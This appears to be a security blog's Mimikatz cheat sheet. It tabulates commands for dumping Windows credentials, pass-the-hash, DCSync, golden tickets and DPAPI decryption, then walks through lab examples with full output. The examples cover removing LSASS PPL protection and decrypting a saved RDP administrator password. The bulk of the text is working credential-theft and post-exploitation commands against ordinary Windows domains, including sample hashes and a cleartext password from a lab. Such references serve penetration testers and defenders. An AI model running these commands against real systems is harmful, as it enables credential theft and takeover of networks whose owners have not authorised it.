Mimikatz is a common tool to extract credentials from Microsoft Windows systems, which can be downloaded here; https://github.com/gentilkiwi/mimikatz
A PowerShell port of Mimikatz is also available here: https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikatz.ps1
Mimikatz Commands
Privilege Escalation
Command | Description |
---|---|
privilege::debug | Enable debug privileges. |
token::elevate | Elevate current process token. |
token::revert | Revert token privileges. |
token::whoami | Display information about the current user’s token. |
Password Extraction and Manipulation
Command | Description |
---|---|
sekurlsa::logonpasswords | Extract credentials from memory. |
lsadump::sam | Extract the SAM database. |
sekurlsa::wdigest | Extract WDigest credentials. |
sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<NTLM_hash> | Perform pass-the-hash attack. |
sekurlsa::ekeys | List kerberos keys. |
lsadump::dcsync /domain:<DomainFQDN> /all | Perform a DCSync attack against a domain controller. |
sekurlsa::minidump lsass.DMP | Extract passwords from a minidump file. |
Kerberos Attacks
Command | Description |
---|---|
kerberos::list | List Kerberos tickets in memory. |
sekurlsa::tickets /export | Export Kerberos tickets. |
sekurlsa::tickets /purge | Purge Kerberos tickets from memory. |
kerberos::ptt <ticket_file> | Pass-the-ticket: Import Kerberos ticket from a file. |
kerberos::golden /user:<username> /domain:<domain> /sid:<domain_sid> /krbtgt:<krbtgt_hash> /ticket:<ticket_file> | Create a Kerberos golden ticket. |
kerberos::tgt | Dump current TGT information. |
kerberos::ptc <target_SPN> | Pass-the-credential: Request service ticket based on current TGT for a given SPN. |
kerberos::list /export | Export Kerberos tickets to file. |
Crypto & Certificate Operations
Command | Description |
---|---|
crypto::capi | Patches the CryptoAPI to make keys exportable. |
crypto::certificates | List certificates in memory. |
crypto::keys | List keys in memory. |
crypto::certificates /export | Export certificates. |
DPAPI & Windows Credential Vault
Command | Description |
---|---|
dpapi::masterkey /in:<masterkey_file> | Load DPAPI master key from a file. |
dpapi::cache | List DPAPI credentials cache. |
dpapi::cred /in:C:\key\location /masterkey:<MASTERKEY> | Decrypt a DPAPI encrypted file using a masterkey |
vault::list | List Windows vault credentials. |
sekurlsa::dpapi | Dump DPAPI keys for all users. |
Miscellaneous
Command | Description |
---|---|
misc::memssp | Patches LSASS so credentials are logged to C:\Windows\System32\mimilsa.log. |
Usage Examples
One Line Commands
If you’re executing Mimikatz from a non-interactive command shell, parameters supplied need to be encapsulated in double quotes, as per the below example;
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 | C:\Tools>mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz(commandline) # privilege::debug Privilege '20' OK mimikatz(commandline) # sekurlsa::logonpasswords Authentication Id : 0 ; 1648146 (00000000:00192612) Session : Interactive from 5 User Name : alice Domain : BORDERGATE Logon Server : DC01 Logon Time : 29/04/2024 17:30:10 SID : S-1-5-21-1220112391-3624315575-3511410581-1104 msv : [00000003] Primary * Username : alice * Domain : BORDERGATE * NTLM : 64f12cddaa88057e06a81b54e73b949b * SHA1 : cba4e545b7ec918129725154b29f055e4cd5aea8 * DPAPI : 7392169935f1a74665da82b62773cff3 |
Removing PPL Protection from LSASS
Upload mimidriver.sys driver to the same directory as your running Mimikatz from, then execute the following commands to remote PPL protection from LSASS.
1 2 3 4 5 | mimikatz # !+ mimikatz # !processprotect /process:lsass.exe /remove mimikatz # privilege::debug mimikatz # token::elevate mimikatz # sekurlsa::logonpasswords |
The driver can be removed with:
1 2 | mimikatz # !processprotect /process:lsass.exe mimikatz # !- |
Extracting Windows Vault RDP Credentials
Mimikatz can be used to extract saved Credential Manager passwords, such as saved RDP credentials.
![](https://www.bordergate.co.uk/wp-content/uploads/2024/05/vault_creds.png)
First, we need to list the credentials available, which are stored in a users AppData folder;
1 2 3 4 5 6 7 8 9 10 11 12 | dir /a C:\Users\alice\AppData\Local\Microsoft\Credentials\ Volume in drive C has no label. Volume Serial Number is 2AD5-BF62 Directory of C:\Users\alice\AppData\Local\Microsoft\Credentials 01/05/2024 18:43 <DIR> . 01/05/2024 18:41 <DIR> .. 01/05/2024 18:43 396 AA1843CE085D8B96A03D81C3D6CD5F07 29/04/2024 18:29 11,052 DFBE70A7E5CC19A398EBF1B96859CE5D 2 File(s) 11,448 bytes 2 Dir(s) 50,326,667,264 bytes free |
We can then used Mimikatz to find which master encryption key is associated with a credential:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 | mimikatz # dpapi::cred /in:C:\Users\alice\AppData\Local\Microsoft\Credentials\AA1843CE085D8B96A03D81C3D6CD5F07 **BLOB** dwVersion : 00000001 - 1 guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} dwMasterKeyVersion : 00000001 - 1 guidMasterKey : {22df88d6-46f5-4560-9d07-b905b6399b34} dwFlags : 20000000 - 536870912 (system ; ) dwDescriptionLen : 00000030 - 48 szDescription : Local Credential Data algCrypt : 00006603 - 26115 (CALG_3DES) dwAlgCryptLen : 000000c0 - 192 dwSaltLen : 00000010 - 16 pbSalt : 6c9182a4f6dd09325d57ad0aba6d3b8b dwHmacKeyLen : 00000000 - 0 pbHmackKey : algHash : 00008004 - 32772 (CALG_SHA1) dwAlgHashLen : 000000a0 - 160 dwHmac2KeyLen : 00000010 - 16 pbHmack2Key : 532c59ee0aa855aa6149b85fcab9dd62 dwDataLen : 000000c8 - 200 pbData : 16946411679f4b62b3895689e4cfe8986a1b55ddb50a5e4744ad991ef972c3159f962b8322b3a1a76539e5dc58398322976459afb66b2aa7fc0f43b954959e920e797deda07bf85d10a4f92d8d6ab18d5b0f8b40b419a89348609b3965ac35fe7de72d159317d57c00a331d2d0e949827d39c05d9c9db576c61aa899ceaa403468bed3f6a0c3bbf5d921285993cbbfe332233c7b17b48dad7c542f0622561c8baf107cca67946869e32e8e1b6c44f29a775b78e8334b1db047852c1f76b2a2e206dda3431d4229fe dwSignLen : 00000014 - 20 pbSign : 7d0232eee442038935c1ff4c2d36ae813052ed39 |
Mimikatz can then be used to decrypt the master encryption key:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 | mimikatz # dpapi::masterkey /in:C:\Users\alice\AppData\Roaming\Microsoft\Protect\S-1-5-21-1220112391-3624315575-3511410581-1104\22df88d6-46f5-4560-9d07-b905b6399b34 /rpc **MASTERKEYS** dwVersion : 00000002 - 2 szGuid : {22df88d6-46f5-4560-9d07-b905b6399b34} dwFlags : 00000000 - 0 dwMasterKeyLen : 00000088 - 136 dwBackupKeyLen : 00000068 - 104 dwCredHistLen : 00000000 - 0 dwDomainKeyLen : 00000174 - 372 [masterkey] **MASTERKEY** dwVersion : 00000002 - 2 salt : 874710a496905265bff3b8d7c32a9ce5 rounds : 00004650 - 18000 algHash : 00008009 - 32777 (CALG_HMAC) algCrypt : 00006603 - 26115 (CALG_3DES) pbKey : 852645998d9f798f7f587da5e0168678f3b948796de93a32d8ec5b76e8da2a818e3d48e484a276cc85a08606cad8de5cf6eeda708f1c2b0ab39ae8b49164a35539bcc20fcb36b756ad9a739b429626f56a8ab41e1d2e3925686e4a918ac2a8e103df57406c41603c [backupkey] **MASTERKEY** dwVersion : 00000002 - 2 salt : e6cad989a10dfd8c3006f1c7189ff1c7 rounds : 00004650 - 18000 algHash : 00008009 - 32777 (CALG_HMAC) algCrypt : 00006603 - 26115 (CALG_3DES) pbKey : 215aae5e4f871dd1bbff35da4d2327a18b3c2e6d5e1b3a66357a995e6f9601a5ec7d7dc7479ec71a0e6d9ed1ba880527688ac6e961a5b6dfee4fccea65f787f9df79dcfb241e22f7 [domainkey] **DOMAINKEY** dwVersion : 00000002 - 2 dwSecretLen : 00000100 - 256 dwAccesscheckLen : 00000058 - 88 guidMasterKey : {b357e77b-14ca-40b1-8bbb-4519ccd27f56} pbSecret : ae90378cef835e995f1b0f7f6dff82914c2897e567ec0c93916b06418b383037d973700b34c36cb2ed82c774197f737b4738275616b0a26721aa836dd8720e166d2d709133a130417845adb36a0a988f40cca376e73ff2083660b2816bec030db585aa5bd90bdf9983e701642d9f2b91bbe5a79649c3014b62b094e4aeaaa87c905195d10c6eb70c074a79ccf1c76d02132fc32bbd818d969991c5e7e8b5347a743bc697d9f70296c438475ad7e8705220d545950a8eb2b43679e3c12b8f2b6932fc2b0d0786c9c4d3f0888b63336078751a77fd2064e2bf47b24ca118b266559dbd0eea136fb7b3c9b4aeba90e7c5f903f23efdfeee7253c18e5d2f55e3d96c pbAccesscheck : a9bf58ff84d39b1342d054382143ddfc0d0da80baa7f90e8bc6c1fdda8cd728d4ae01e37697cf36ac54a2cdc9db8d87ec86ac4cd511e66471b1dcb50fd94e73cdcf30553b70881fe06f87ba802fda40beaa9d13c50a24a67 Auto SID from path seems to be: S-1-5-21-1220112391-3624315575-3511410581-1104 [backupkey] without DPAPI_SYSTEM: key : 1bef6c3f1d68fed793f40adf81f40af5fad20c7b6a7a260c6b03e249d05dc823 sha1: 87b7a5d5fffc653128d09c0a65afe9470b7d2c07 [domainkey] with RPC [DC] 'bordergate.local' will be the domain [DC] 'DC01.bordergate.local' will be the DC server key : 14695a9f73ecb64de687480d456e5b277ba9b29e0be2a5bab72ba8fd012420248ac0c9372bd45f113c4347803bf09ca56f6afb59be67a88c81f2dfbdedb95263 sha1: b535443c8c459fe08911f85779f1bbed0bf9bef6 |
Using the masterkey we just extracted, we can decrypt the RDP password.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 | mimikatz # dpapi::cred /in:C:\Users\alice\AppData\Local\Microsoft\Credentials\AA1843CE085D8B96A03D81C3D6CD5F07 /masterkey:14695a9f73ecb64de687480d456e5b277ba9b29e0be2a5bab72ba8fd012420248ac0c9372bd45f113c4347803bf09ca56f6afb59be67a88c81f2dfbdedb95263 **BLOB** dwVersion : 00000001 - 1 guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} dwMasterKeyVersion : 00000001 - 1 guidMasterKey : {22df88d6-46f5-4560-9d07-b905b6399b34} dwFlags : 20000000 - 536870912 (system ; ) dwDescriptionLen : 00000030 - 48 szDescription : Local Credential Data algCrypt : 00006603 - 26115 (CALG_3DES) dwAlgCryptLen : 000000c0 - 192 dwSaltLen : 00000010 - 16 pbSalt : 6c9182a4f6dd09325d57ad0aba6d3b8b dwHmacKeyLen : 00000000 - 0 pbHmackKey : algHash : 00008004 - 32772 (CALG_SHA1) dwAlgHashLen : 000000a0 - 160 dwHmac2KeyLen : 00000010 - 16 pbHmack2Key : 532c59ee0aa855aa6149b85fcab9dd62 dwDataLen : 000000c8 - 200 pbData : 16946411679f4b62b3895689e4cfe8986a1b55ddb50a5e4744ad991ef972c3159f962b8322b3a1a76539e5dc58398322976459afb66b2aa7fc0f43b954959e920e797deda07bf85d10a4f92d8d6ab18d5b0f8b40b419a89348609b3965ac35fe7de72d159317d57c00a331d2d0e949827d39c05d9c9db576c61aa899ceaa403468bed3f6a0c3bbf5d921285993cbbfe332233c7b17b48dad7c542f0622561c8baf107cca67946869e32e8e1b6c44f29a775b78e8334b1db047852c1f76b2a2e206dda3431d4229fe dwSignLen : 00000014 - 20 pbSign : 7d0232eee442038935c1ff4c2d36ae813052ed39 Decrypting Credential: * volatile cache: GUID:{22df88d6-46f5-4560-9d07-b905b6399b34};KeyHash:b535443c8c459fe08911f85779f1bbed0bf9bef6;Key:available * masterkey : 14695a9f73ecb64de687480d456e5b277ba9b29e0be2a5bab72ba8fd012420248ac0c9372bd45f113c4347803bf09ca56f6afb59be67a88c81f2dfbdedb95263 **CREDENTIAL** credFlags : 00000030 - 48 credSize : 000000c2 - 194 credUnk0 : 00000000 - 0 Type : 00000002 - 2 - domain_password Flags : 00000000 - 0 LastWritten : 01/05/2024 14:43:56 unkFlagsOrSize : 00000018 - 24 Persist : 00000002 - 2 - local_machine AttributeCount : 00000000 - 0 unk0 : 00000000 - 0 unk1 : 00000000 - 0 TargetName : Domain:target=TERMSRV/DC01 UnkData : (null) Comment : (null) TargetAlias : (null) UserName : BORDERGATE\Administrator CredentialBlob : Password1 Attributes : 0 |
Common Errors
If you receive the error message kuhl_m_sekurlsa_acquireLSA, ensure you are running the command in an Adminstrator command prompt, and that the privilege::debug command has been issued first;
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 | mimikatz # sekurlsa::logonpasswords ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::logonpasswords Authentication Id : 0 ; 1648146 (00000000:00192612) Session : Interactive from 5 User Name : alice Domain : BORDERGATE Logon Server : DC01 Logon Time : 29/04/2024 18:00:10 SID : S-1-5-21-1220112391-3624315575-3511410581-1104 msv : [00000003] Primary * Username : alice * Domain : BORDERGATE * NTLM : 64f12cddaa88057e06a81b54e73b949b * SHA1 : cba4e545b7ec918129725154b29f055e4cd5aea8 * DPAPI : 7392169935f1a74665da82b62773cff3 |